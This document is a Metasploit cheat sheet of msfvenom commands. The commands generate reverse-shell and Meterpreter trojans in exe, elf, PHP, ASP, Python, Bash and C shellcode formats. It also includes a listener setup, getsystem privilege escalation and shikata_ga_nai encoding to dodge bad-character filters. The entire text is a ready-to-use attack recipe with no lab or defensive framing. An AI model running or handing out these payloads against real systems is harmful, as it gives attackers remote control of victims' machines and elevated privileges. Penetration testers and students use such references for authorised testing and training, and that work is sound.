1. Generate a reverse-connection trojan (script or executable)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe
2. MSF handler (listener) setup
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.111
exploit
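3. Use automated privilege escalation, calling other exploits to escalate privileges
getuid: check the current privileges
getsystem: automated privilege escalation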
4. MSF Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> -f exe > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -f raw > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
Generate a reverse Meterpreter shell for Linux with MSF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -f elf -a x86 --platform linux -o shell
Generate a reverse shell as C shellcode with MSF
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
Generate a reverse Python shell with MSF
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
Generate a reverse ASP shell with MSF
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
Generate a reverse Bash shell with MSF
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
Generate a reverse PHP shell with MSF
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php
Add <?php at the beginning:
perl -i~ -0777pe's/^/<?php \n/' shell.php
Generate a reverse Windows shell with MSF
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
